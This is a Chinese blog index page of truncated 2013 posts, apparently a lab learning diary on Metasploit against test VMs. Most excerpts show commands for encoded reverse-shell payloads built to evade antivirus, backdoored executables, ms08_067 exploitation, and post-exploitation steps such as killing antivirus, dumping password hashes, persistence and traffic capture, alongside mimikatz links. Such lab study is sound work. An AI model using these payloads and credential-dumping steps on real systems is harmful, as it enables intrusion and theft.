自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(44)
  • 收藏
  • 关注

原创 metasploit启动远程shell而不被杀毒软件发现

root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikat

2013-04-29 22:36:37 2461

原创 metasploit自定义可执行文件模板

在网上下载Sysinternals,解压,得到procexp.exe,把它传到BT5上去,然后生成pe_backdoor.exeroot@bt:/opt/metasploit/msf3# mkdir workroot@bt:/opt/metasploit/msf3# cp ~/procexp.exe work/root@bt:/opt/metasploit/msf3# ls work/p

2013-04-29 22:27:18 2336

原创 metasploit多重编码

root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_

2013-04-29 21:07:36 2580

原创 metasploit使用msf编码器

root@bt:~# msfencode -lFramework Encoders================== Name Rank Description ---- ---- ----------- cmd/generic_sh

2013-04-29 20:25:20 3498

原创 metasploit与avg杀毒软件

在网上下载了avg杀毒软件,在虚拟机XP上安装了一下,然后,把metasploit生成的payload1.exe上传到XP的C盘。root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 X > payload1.exeCreated by msfpayload (http://www.m

2013-04-29 20:09:37 1018

转载 metasploit的常用命令

http://www.offensive-security.com/metasploit-unleashed/Meterpreter_BasicsMeterpreter BasicsSince the Meterpreter provides a whole new environment, we will cover some of the basic M

2013-04-28 22:01:22 3049

原创 metasploit的文件系统的命令

1、lsmeterpreter > lsListing: C:\============Mode Size Type Last modified Name---- ---- ---- ------------- ----40777/rwxrwxr

2013-04-28 21:42:57 777

原创 metasploit的msfpayload创建可独立运行的二进制文件

root@bt:~# msfpayload windows/shell_reverse_tcp O Name: Windows Command Shell, Reverse TCP Inline Module: payload/windows/shell_reverse_tcp Version: 14774 Platform: Windows

2013-04-28 21:26:04 3779

原创 metasploit通过附加的Railgun组件操作Windows API

msf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(ms08_067_netapi) > set

2013-04-28 15:22:41 2143 1

原创 metasploit将命令行shell升级为meterpreter

msf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(ms08_067_netapi) > set

2013-04-28 14:45:09 8059 3

原创 metasploit控制持久化

msf exploit(ms08_067_netapi) > exploit[*] Started reverse handler on 192.168.1.11:4444 [*] Attempting to trigger the vulnerability...[*] Sending stage (752128 bytes) to 192.168.1.142[*] Meterpre

2013-04-27 23:52:25 4672 1

原创 redhat9修改IP等网络配置

[root@localhost root]# cat /etc/sysconfig/network-scripts/ifcfg-eth0DEVICE=eth0BOOTPROTO=staticONBOOT=yesIPADDR=192.168.1.21NETMASK=255.255.255.0NETWORK=192.168.1.0GATEWAY=192.168.1.1[root@lo

2013-04-27 21:30:55 1918

原创 metasploit查看目标机上的所有流量

meterpreter > run packetrecorder -i 1[*] Starting Packet capture on interface 1[+] Packet capture started[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/ROOT-9743DD32E3_201304

2013-04-27 18:09:12 1715

原创 metasploit获取系统信息

meterpreter > run scraper[*] New session on 192.168.1.142:445...[*] Gathering basic system information...[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: O

2013-04-27 18:05:30 1816

原创 metasploit获取系统密码hash值

meterpreter > run hashdump[*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY e503dc5ce6734d7f11ccecf5623b0f1c...[*] Obtaining the user list and keys...[*] Decrypting user keys

2013-04-27 18:03:38 6051

原创 metasploit关闭杀毒软件

meterpreter > run killav[*] Killing Antivirus services on the target...meterpreter >特意在XP上装了360,但是没有成功关闭杀毒软件。不知道为什么。

2013-04-27 18:02:04 3821

原创 metasploit迁移进程

msf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > set RHOST 192.168.1.142RHOST => 192.168.1.142msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

2013-04-27 17:18:55 3338

原创 metasploit运行run vnc

msf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > set RHOST 192.168.1.142RHOST => 192.168.1.142msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

2013-04-27 16:43:59 15846

原创 metasploit的session操作

msf > sessions -lActive sessions=============== Id Type Information Connection -- ---- ----------- -

2013-04-25 22:29:45 18008

原创 metasploit入侵后的网络操作

meterpreter > run get_local_subnetsLocal subnet: 192.168.1.0/255.255.255.0meterpreter >上面是获得受控系统的本地子网掩码的命令。meterpreter > ifconfigInterface 1============Name : MS TCP Loopback

2013-04-25 22:28:41 2964 1

原创 metasploit的令牌假冒攻击

root@bt:~# msfconsole NOTICE: CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for t

2013-04-25 22:04:49 3304

原创 PsExec的问题及其解决办法

C:\>PsExec.exe \\192.168.1.142 cmdPsExec v1.98 - Execute processes remotelyCopyright (C) 2001-2010 Mark RussinovichSysinternals - www.sysinternals.comCouldn't access 192.168.1.142:登录失败: 未知的用户名或

2013-04-24 23:12:56 23446 4

原创 net use实验

C:\>net use \\192.168.1.141\ipc$ "" /user:""命令成功完成。C:\>net use \\192.168.1.141\ipc$ /del\\192.168.1.141\ipc$ 已经删除。加上用户名和密码,发生如下错误:C:\>net use \\192.168.1.141\ipc$ "yang" /user:"yang

2013-04-24 21:46:19 3909 1

转载 jQuery中each的break和continue

http://rmn190.iteye.com/blog/791605 北京分公司 天津分公司 河北分公司 山西分公司 $("option").each(function(){ if($(this).val() == 11){ return false; // false时相当于break, 如果return true

2013-04-23 21:48:24 2988

转载 PsExec下载地址及其用法

PsExec下载地址   PSTools.ziphttp://technet.microsoft.com/en-us/sysinternals/bb897553.aspxUsing PsExecSee the July 2004 issue of Windows IT Pro Magazine for Mark's article that covers

2013-04-23 21:07:03 6166

原创 用mimikatz来获取win7的密码

mimikatz下载地址:http://www.webshell.cc/wp-content/uploads/2012/02/mimikatz_trunk.ziphttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zipblog.gentilkiwi.com应该是法国佬的博客。用mimikatz来获

2013-04-23 20:33:22 8151

原创 java、axis2、wsdl

在axis2下载zip包和war包,我下载的是http://mirrors.cnnic.cn/apache//axis/axis2/java/core/1.6.2/axis2-1.6.2-bin.zip和http://mirrors.cnnic.cn/apache//axis/axis2/java/core/1.6.2/axis2-1.6.2-war.zip下载完后,解压axis2-1

2013-04-22 21:51:04 7766

原创 给BT5设置ssh服务

ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_keyservice ssh stopservice ssh start生产密钥key时,需要设置密码。我是直接按回车的。启动ssh服务后,在XP上用secure crt去连。

2013-04-21 22:00:44 3469

原创 hashdump获得XP的用户密码的hash值

入侵XP成功后,命令:use privrun post/windows/gather/hashdump这样就可以获得用户的密码的hash值了。

2013-04-21 21:47:41 5871

原创 meterpreter获取系统信息和键盘记录

刚下载了BT5,今天就用BT5来测试。输入ps,图片上面没有显示,不知道为什么。我在XP上打开了记事本程序,下面再ps一下,就显示notepad.exe了。在下面的图中,看到notepad的pid是1024,输入命令migrate 1024就将回话迁移到notepad上面去了。然

2013-04-20 23:30:04 6103

原创 入侵mssql2000

环境:XP + SP3 + MS SQL SERVER 2000 + SP4数据库配置如下:配置成SQL Server验证,sa密码是root123。BT4里用metasploit入侵过程如下:上面第一次登陆失败,是因为mssql2000的登陆模式

2013-04-19 22:18:56 1479

原创 入侵samba服务器失败

用bt4来入侵ubuntu9.0.4的samba服务器失败。失败总是有原因。还不知道为什么失败。上面的DCERPC FAULT => nca_op_rng_error是什么意思?

2013-04-14 22:47:43 1192

原创 ms08_067被成功exploit

昨天用的环境是FC9,exploit失败。我怀疑是xp版本的问题,于是下了xp + sp2的英文版本,然后再用FC9里的metasploit来exploit,还是失败。看到作者用的是backtrack,于是,下载了一个bt4。bt4里面自带了metasploit。这次,exploit成功了。过程如下:

2013-04-12 22:09:58 5931 1

原创 用metasploit来exploit虚拟机XPSP3的ms08_067

看到MS08-067: VULNERABLE,说明有漏洞exploit失败,不知道原因。书里写着这样几句话:“这暗示我们或许能够对这台主机进行攻击。攻击是否成功取决于目标主机的操作系统版本、安装的服务包版本以及语言类型,同时还依赖于是否成功地绕过了数据执行保护DEP。”我想可能没有成功绕过DEP吧。

2013-04-11 22:06:52 4051

转载 十条常用nmap命令行格式

1) 获取远程主机的系统类型及开放端口nmap -sS -P0 -sV -O 这里的 可以是单一 IP, 或主机名,或域名,或子网-sS TCP SYN 扫描 (又称半开放,或隐身扫描)-P0 允许你关闭 ICMP pings.-sV 打开系统版本检测-O 尝试识别远程操作系统其它选项:-A 同时打开操作系统指纹和版本检测-v 详细输出扫描情况.nmap

2013-04-10 22:34:10 1039

原创 安装Nessus

[root@localhost ~]# rpm -ivh Nessus-5.0.3-es6.i386.rpm error: Failed dependencies: libc.so.6(GLIBC_2.11) is needed by Nessus-5.0.3-es6.i386[root@localhost ~]# rm -f Nessus-5.0.3-es6.i386.rpm [root

2013-04-09 22:57:45 1305

原创 安装NeXpose失败

环境是虚拟机fedora9,内存512MB,安装过程如下:[root@localhost ~]# ./NeXposeSetup-Linux32.bin Unpacking JRE ...Starting Installer ...[root@localhost ~]# ./NeXposeSetup-Linux32.bin -cUnpacking JRE ...Starting I

2013-04-09 22:25:12 3656

原创 用netcat和telnet来获取IIS的旗标

今天,下了两个IIS,一个是5.1的,一个是6.0的。一直以为只是版本的差别,别的没什么不同。结果,在XP上安装6.0,装不上。上网查了一下,才知道5.1用于XP,6.0用于2003。安装好后,打开http://127.0.0.1/,竟然要输入密码,上网查了一下,才知道默认的两个网页,好像是加密过的。于是,自己用dreamweaver8生成了一个index.htm,放到C:\Inetpub\www

2013-04-09 21:50:00 2138

原创 metasploit编写自己的扫描器

require 'msf/core'class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'My custom TCP scan', 'Versio

2013-04-08 22:50:50 3789 1

转载 8个实用的Linux netcat命令示例

Netcat 或者叫 nc 是 Linux 下的一个用于调试和检查网络工具包。可用于创建 TCP/IP 连接,最大的用途就是用来处理 TCP/UDP 套接字。这里我们将通过一些实例来学习 netcat 命令。1. 在服务器-客户端架构上使用 Netcatnetcat 工具可运行于服务器模式,侦听指定端口1$ nc -l 2389

2013-04-08 22:12:35 724

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除